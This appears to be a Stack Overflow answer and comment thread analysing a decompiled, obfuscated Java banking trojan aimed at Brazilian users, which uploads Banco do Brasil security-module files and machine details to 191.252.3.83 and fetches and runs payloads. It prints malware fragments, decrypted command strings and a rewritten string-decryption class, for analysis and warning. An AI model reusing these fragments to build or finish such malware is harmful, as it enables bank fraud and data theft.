BE CAREFUL WHEN EXECUTING THIS CODE
THIS PROGRAM IS A VIRUS
What does it do:
- Detects the locale and refuses to do anything if it does not detect that the operating system is configured for Brazil and Portuguese, or if the machine has already been infected (which it detects by looking for the file APPDATA/Sun/Java/Deployment/Sun.jar).
- Creates and executes VBScript scripts that run on system startup (the "startup" folder). After the installation is complete, one of these scripts is executed whenever the user presses Ctrl+Alt+F.
- Uploads GPC files to the IP 191.252.3.83. These files belong to the Gbplugin module, the Banco do Brasil security module that is also used by other banks. It also sends information about your operating system, your hard drive serial number and your IP to that same malicious destination. It first converts the data to a string of hexadecimal characters written backwards to make detection harder.
- Downloads files, compresses them (using the GZIP algorithm), puts them in hidden folders with random names inside the "APPDATA" folder and executes them. It uses the extensions ".mp3", ".jar", ".bat", ".wmv", ".xml" and ".pdf" for these files.
- Forcibly reboots the machine, ensuring your system is compromised.
This code is obfuscated. The comment at the beginning makes it clear that it has been decompiled. The obfuscation process mangled all the variable names, turning them into meaningless strings. In addition, String values and constants are encrypted.
To unravel this tangle and find out what the code does, the first step is to rename the variables.
For example:
public static boolean GDDSSZZXXVVNNaabcceegghhjUOPPKKJJ(String pprrsuuxxzzwQQEETTYIIOOLLJJHHFFDDAAXCCCBBNaacddffgiggijjmmo) {
    File ddffhhiillmmooqqXCBBaaac = new File(pprrsuuxxzzwQQEETTYIIOOLLJJHHFFDDAAXCCCBBNaacddffgiggijjmmo);
    boolean wwWWEtttuxxyy = ddffhhiillmmooqqXCBBaaac.exists();
    return wwWWEtttuxxyy;
}
This is the result:
public static boolean GDDSSZZXXVVNNaabcceegghhjUOPPKKJJ(String caminhoDoArquivo) {
    File arquivo = new File(caminhoDoArquivo);
    boolean existe = arquivo.exists();
    return existe;
}
With this it becomes clear what the method does, so we can rename and simplify it:
public static boolean arquivoExiste(String caminhoDoArquivo) {
    return new File(caminhoDoArquivo).exists();
}
And then you do this with all the methods, one by one. It is like a puzzle, where to solve a more complicated part you first have to solve a simpler one. So you start with the simplest methods and then move on to the most complicated ones.
There are some parts that handle the encryption of other parts of the program. In particular, these three methods are the most important:
public static String uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(int Nu) {
    byte[] ZCCBNNaabbddfggiijjHHFFDDAZ = new byte[]{47, 56, 67, 66, 67, 47, 80, 75, 67, 83, 53, 97, 100, 100, 105, 110, 103, 85, 84, 70, 45, 68, 69, 80, 83, 105, 106, 109, 110, 112, 112, 114, 115, 115, 117, 117, 118, 118, 122, 122, 119, 81, 81, 69, 69, 82, 82, 89, 89, 73, 73, 79, 79, 76, 75, 75, 72, 72};
    // returns the single character stored at position Nu of the table
    return new String(ZCCBNNaabbddfggiijjHHFFDDAZ, Nu, 1);
}
private static byte[] WWEETTYIIIPuuxxzzww(String HHFFDDAAZZCCBBNNaYIOOLLKK) {
    // converts a hexadecimal string into its bytes, two characters at a time
    byte[] jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi = new byte[HHFFDDAAZZCCBBNNaYIOOLLKK.length() / 2];
    int i = 0;
    while (i < jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi.length) {
        String iillmmoopprrttuuxxzwwWWEETTYYIIPPLaacddffg = HHFFDDAAZZCCBBNNaYIOOLLKK.substring(2 * i, 2 * i + 2);
        int XXCCBBaaaccddfhhiillmmooqqrrttuuxxyywwJHHFSSAA = Integer.parseInt(iillmmoopprrttuuxxzwwWWEETTYYIIPPLaacddffg, 16);
        jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi[i] = (byte)XXCCBBaaaccddfhhiillmmooqqrrttuuxxyywwJHHFSSAA;
        ++i;
    }
    return jjmmooprrssuuxxzzwwQQETTYYIIOOLLJHHFFFDDAAXCCBBNbddffggi;
}
public static String SAAXXCCBBaaaccddfLJJHHFFS(String PPLLJJGGFFSSSAAXVVVBaaaacEETTUUII) throws Exception {
    byte[] lnnoqqrrttvvxxyywwWWReefhhiil = Vegimmnp.WWEETTYIIIPuuxxzzww(PPLLJJGGFFSSSAAXVVVBaaaacEETTUUII);
    Cipher KJJGGFFSSSZZXXVVBBaabcceeffhjjllnnoTTUUIPPK = Cipher.getInstance(
        String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(21))
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(22)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(24)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(0)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(2)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(3)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(4)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(5)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(6)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(7)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(8)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(9)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(10)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(23)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(11)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(12)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(13)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(14)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(15)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(16));
    DESKeySpec xyyQQWWRRTTUUOOPPKKJJGGDSSZZXXXVNNaabccqqsttvvx = new DESKeySpec(ggillmmooprrtNNaccddf.getBytes(
        String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(17))
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(18)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(19)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(20)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(1)));
    SecretKeyFactory nnpqqssttvzzyyQQWWRRYYUOOPegghjjll = SecretKeyFactory.getInstance(
        String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(21))
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(22)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(24));
    SecretKey SZZCCVKKHGGDDS = nnpqqssttvzzyyQQWWRRYYUOOPegghjjll.generateSecret(xyyQQWWRRTTUUOOPPKKJJGGDSSZZXXXVNNaabccqqsttvvx);
    IvParameterSpec egghjjmmnnppqqsuuvvzzyyQQEERRYUUOOLLKHNaabbdde = new IvParameterSpec(ggillmmooprrtNNaccddf.getBytes(
        String.valueOf(Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(17))
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(18)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(19)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(20)
        + Vegimmnp.uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(1)));
    // 2 == Cipher.DECRYPT_MODE
    KJJGGFFSSSZZXXVVBBaabcceeffhjjllnnoTTUUIPPK.init(2, (Key)SZZCCVKKHGGDDS, egghjjmmnnppqqsuuvvzzyyQQEERRYUUOOLLKHNaabbdde);
    byte[] CCVVNaabbdeeggiijjmnnpprrGGDDAAZZ = KJJGGFFSSSZZXXVVBBaabcceeffhjjllnnoTTUUIPPK.doFinal(lnnoqqrrttvvxxyywwWWReefhhiil);
    return new String(CCVVNaabbdeeggiijjmnnpprrGGDDAAZZ);
}
What exactly does it do? This is the part responsible for decrypting many of the program's secrets, which can be deduced from its use of classes such as SecretKey, SecretKeyFactory and Cipher. You can use the debugger and a few System.out.println calls to understand which values this method manipulates.
Also, the test I did below confirms that it serves to decrypt things. For example, I ran the following test with some of the encrypted strings in the program:
public static void main(String[] args) throws Exception {
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("48b7bda975cc41e6716484a94b74cccccb6be918ad95414abfb3ca29acc894409d7118cedf6c560389bb72ec45f47a9de1d535737acf4db7"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("c7ebe084d263c6a0"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("8e44e85efe2cce2652e7cb552572cd96ca54a4fb172beb92f4ca05e9f8312239"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("c9fdd6ece6b2278dfaad22350fb54187"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("0763ff114133fb7e"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("f97815b28e5a1bd5"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("8b3a37900826a2005e5a4557a7c48821"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("ae702fe2558f88239e0813851c07cb9b"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("5afe0cfeed4375da9a8a61e3c8f54b357a9db2aebaf3df97bb6502bbeca5e5aebf3d48cfdf69e005"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("4840f3430f6e49578c97693ce45fa1a28f5066451b7ed265"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("beeb93a7429eff3305c986801a0df210"));
    System.out.println(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("75090231081454157b1d08e3c1f35afb8b4ead755bc7be5f"));
}
Here is what it prints as output:
Set WshShell = WScript.CreateObject("WScript.Shell")
8
/Sun/Java/Deployment/Sun.jar
191.252.3.83
APPDATA
http
/pdf/jjgf.pdf
dos:hidden
shutdown -r -t 30 -c Atualizando...
ProgramFiles(X86)
\\AppBrad\\
cscript //NoLogo
So you could replace Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("c7ebe084d263c6a0") with "8", and Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("48b7bda975cc41e6716484a94b74cccccb6be918ad95414abfb3ca29acc894409d7118cedf6c560389bb72ec45f47a9de1d535737acf4db7") with "Set WshShell = WScript.CreateObject(\"WScript.Shell\")", and so go on simplifying and decrypting the code. In the end, after decrypting everything, you can probably throw these decryption methods away.
There is a compilation problem regarding a line with a String.this. I don't know why the decompiler went wrong there, but I just put a null in its place to get it to compile. When you deobfuscate several parts of the program, this should become clearer and then you can repair that spot.
EDIT: In this case, what should be in place of the String.this is the second parameter of the method involving the anonymous class where the String.this was placed (i.e., aabbceeghhjjllnnppqqsttvvzzyQQWWRYYUUOPPKKHHGSSZXXVVN).
As explained above, this code is a virus. It handles files and commands in VBScript. Moreover, it also produces URLs:
public static String vvzwwQEERRnpprrsuu() throws UnknownHostException {
    String ZZCCBBNNaabKHHFFDDA = new String(InetAddress.getLocalHost().getHostName());
    return ZZCCBBNNaabKHHFFDDA.toUpperCase();
}
And it also connects to the internet:
HttpURLConnection ZCCVVNNabbddeegiijjmnnpprrsuuvvzwwQQERRYYIIOOLLJJHHGGDDAA = (HttpURLConnection)vzyyQQEERRYYUOOLLKjmnqsuuv.openConnection();
It also runs other programs/commands:
public static void WWEETYYIIPPLJJHHFFSSAAXXCCBaaaccdfttuuxzzw() throws Exception {
    Runtime.getRuntime().exec(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("5afe0cfeed4375da9a8a61e3c8f54b357a9db2aebaf3df97bb6502bbeca5e5aebf3d48cfdf69e005"));
}
Which decrypts to:
public static void WWEETYYIIPPLJJHHFFSSAAXXCCBaaaccdfttuuxzzw() throws Exception {
    Runtime.getRuntime().exec("shutdown -r -t 30 -c Atualizando...");
}
That is, it forces a reboot of the machine it runs on.
And also:
Process ywwWRRTTUUIPrrttvxxy = Runtime.getRuntime().exec(String.valueOf(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("75090231081454157b1d08e3c1f35afb8b4ead755bc7be5f")) + ttuxxzwwWWEETTYIIPPLLJJHHFFSSAAXCCBBaaaaclmoopprr.getPath());
Which decrypts to:
Process ywwWRRTTUUIPrrttvxxy = Runtime.getRuntime().exec(String.valueOf("cscript //NoLogo ") + ttuxxzwwWWEETTYIIPPLLJJHHFFSSAAXCCBBaaaaclmoopprr.getPath());
That is, it starts the execution of another program.
Changes file attributes:
public static void jjllnooqsstbbcceffh(Path RRTTUUOOPvvxyyQWW) throws Exception {
    Files.setAttribute(RRTTUUOOPvvxyyQWW, Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("ae702fe2558f88239e0813851c07cb9b"), true, new LinkOption[0]);
}
Which decrypts to:
public static void jjllnooqsstbbcceffh(Path RRTTUUOOPvvxyyQWW) throws Exception {
    Files.setAttribute(RRTTUUOOPvvxyyQWW, "dos:hidden", true, new LinkOption[0]);
}
That is, it hides files.
It also reads environment variables:
jjllnooqqsstvvxxyyQWWRRTTUOOPPKKJGGDDSSZbbcceffh = String.valueOf(System.getenv(Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("4840f3430f6e49578c97693ce45fa1a28f5066451b7ed265"))) + Vegimmnp.SAAXXCCBBaaaccddfLJJHHFFS("beeb93a7429eff3305c986801a0df210");
Which decrypts to:
jjllnooqqsstvvxxyyQWWRRTTUOOPPKKJGGDDSSZbbcceffh = String.valueOf(System.getenv("ProgramFiles(X86)")) + "\\AppBrad\\";
After a few hours of work, I finally finished deobfuscating and decrypting it completely, so I have a readable version of its code. However, I will not post it because it is something very dangerous. I will just say that whoever did it is a complete asshole. The code also has some bad programming practices. Here are some of the nefarious things it does:
- Creates multiple files on the system.
- Scans the system for specific Gbplugin files, which is the security module of Banco do Brasil, and sends them over the internet.
- Hides files and folders.
- Connects to the internet to upload and download.
- Downloads programs from the internet and runs them.
- Creates and executes scripts in VBScript.
- Reads environment variables.
- Forces the machine to reboot.
- Reads the serial number of the hard drive and sends it over the internet, along with your IP and operating system details.
- Creates a script that runs on system startup via a shortcut.
Also, the author of this is clearly making a great effort to hide the purpose of the code.
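Putting the three methods shown in the answer together, this is what the string decryption routine looks like once the variables have been renamed and the lookup-table indirection has been folded away. It is an added example, not code from the original post or from the malware: the byte table and the index sequences are copied from the decompiled methods, but the static key string (the field called ggillmmooprrtNNaccddf in the decompiled class) is not shown on the page, so it is taken here as a constructor argument that the analyst supplies after locating it in the class.

```java
import java.nio.charset.StandardCharsets;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
import javax.crypto.spec.IvParameterSpec;

/**
 * Cleaned-up equivalent of the three obfuscated methods: the character
 * table lookup, the hex-to-bytes conversion and the DES/CBC decryption.
 */
public final class StringDecryptor {

    // Byte table copied from uuxzzwwQQEETTYYIOOLLJJHHFFDDAAXXCBBNNaccdmopprrss(int).
    private static final byte[] TABLE = {
        47, 56, 67, 66, 67, 47, 80, 75, 67, 83, 53, 97, 100, 100, 105, 110, 103,
        85, 84, 70, 45, 68, 69, 80, 83, 105, 106, 109, 110, 112, 112, 114, 115,
        115, 117, 117, 118, 118, 122, 122, 119, 81, 81, 69, 69, 82, 82, 89, 89,
        73, 73, 79, 79, 76, 75, 75, 72, 72
    };

    // Index sequences copied from the calls inside SAAXXCCBBaaaccddfLJJHHFFS.
    private static final int[] TRANSFORMATION_IDX =
        {21, 22, 24, 0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 23, 11, 12, 13, 14, 15, 16};
    private static final int[] CHARSET_IDX = {17, 18, 19, 20, 1};
    private static final int[] KEY_ALGORITHM_IDX = {21, 22, 24};

    /** Rebuilds one hidden string constant from its sequence of table indices. */
    static String resolveConstant(int[] indices) {
        StringBuilder sb = new StringBuilder(indices.length);
        for (int i : indices) {
            sb.append((char) TABLE[i]);
        }
        return sb.toString();
    }

    /** Readable replacement for WWEETTYIIIPuuxxzzww: hex string to bytes. */
    static byte[] hexToBytes(String hex) {
        if (hex.length() % 2 != 0) {
            throw new IllegalArgumentException("odd-length hex string");
        }
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        }
        return out;
    }

    private final byte[] keyBytes;

    /**
     * @param keyString the hidden static string (ggillmmooprrtNNaccddf in the
     *                  decompiled class, not shown on the page; supplied by the
     *                  analyst). The malware passes the same bytes to DESKeySpec
     *                  and to IvParameterSpec, so it has to be exactly 8 bytes.
     */
    StringDecryptor(String keyString) {
        this.keyBytes = keyString.getBytes(StandardCharsets.UTF_8);
        if (keyBytes.length != 8) {
            throw new IllegalArgumentException("DES key/IV must be exactly 8 bytes");
        }
    }

    /** Readable replacement for SAAXXCCBBaaaccddfLJJHHFFS. */
    String decrypt(String hexCiphertext) throws Exception {
        String transformation = resolveConstant(TRANSFORMATION_IDX); // "DES/CBC/PKCS5Padding"
        String keyAlgorithm = resolveConstant(KEY_ALGORITHM_IDX);     // "DES"

        SecretKey key = SecretKeyFactory.getInstance(keyAlgorithm)
                .generateSecret(new DESKeySpec(keyBytes));
        Cipher cipher = Cipher.getInstance(transformation);
        // The original calls init(2, ...); 2 is Cipher.DECRYPT_MODE.
        cipher.init(Cipher.DECRYPT_MODE, key, new IvParameterSpec(keyBytes));
        byte[] plain = cipher.doFinal(hexToBytes(hexCiphertext));
        return new String(plain, StandardCharsets.UTF_8);
    }

    /** Usage: java StringDecryptor <8-byte key string> <hex ciphertext> */
    public static void main(String[] args) throws Exception {
        System.out.println(resolveConstant(TRANSFORMATION_IDX));
        System.out.println(resolveConstant(CHARSET_IDX));
        System.out.println(resolveConstant(KEY_ALGORITHM_IDX));
        if (args.length == 2) {
            System.out.println(new StringDecryptor(args[0]).decrypt(args[1]));
        }
    }
}
```

Running it without arguments only resolves the three constants: the index sequences decode to "DES/CBC/PKCS5Padding", "UTF-8" and "DES", which is why the routine is single DES in CBC mode with the key doubling as the IV. That also explains the ciphertext sizes in the test above: every hex string has a length that is a multiple of 16 (8-byte blocks), and the 52-character VBScript line needs 56 bytes after PKCS5 padding, matching its 112-character ciphertext. Once the key string is located in the class, the second form of the command decrypts one constant at a time, which is quicker than editing the main method for each string.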
This code looks like it was obfuscated and you are trying to reverse it. Does it belong to you?
– user28595
This code was obtained by reverse engineering?
– Elexsandro Rangel dos Santos
I believe that kind of question is not in accordance with the terms of the community; I don't think unraveling code made by someone else (possibly constituting intellectual property theft) should be answered.
– Lucas Queiroz Ribeiro
@Lucasqueirozribeiro It is not possible to say whether it is intellectual property theft or not. I've seen cases where a company ends up having to do this sort of thing with its own code when the source was lost.
– Victor Stafusa
I deleted my comments because my answer already covers everything written on them.
– Victor Stafusa
@Victorstafusa That is why I used the word "possibly", to denote that we might be helping someone do something wrong. (Since there is no context in the question it is difficult to know.) I only warned because sometimes the person himself doesn't know what he is doing and the consequences of something like this.
– Lucas Queiroz Ribeiro
@Lucasqueirozribeiro By the content of the code, I'd say it's not intellectual property theft. I think the obfuscated code is actually a virus/malware. In this case, he also "may not know what he's doing and the consequences of something like that", but for a completely different reason.
– Victor Stafusa
@Victorstafusa If the code wasn't made by him and he's trying to use it, it could be intellectual property theft regardless. I understand your intention to warn him so that he does not execute the code; however, what if it really is malware and he is trying to complete it? Would your help still be welcome? Would that question still belong to the scope of Stack Overflow? Those are just the points I wanted to raise, but I think it's a matter of opinion :p
– Lucas Queiroz Ribeiro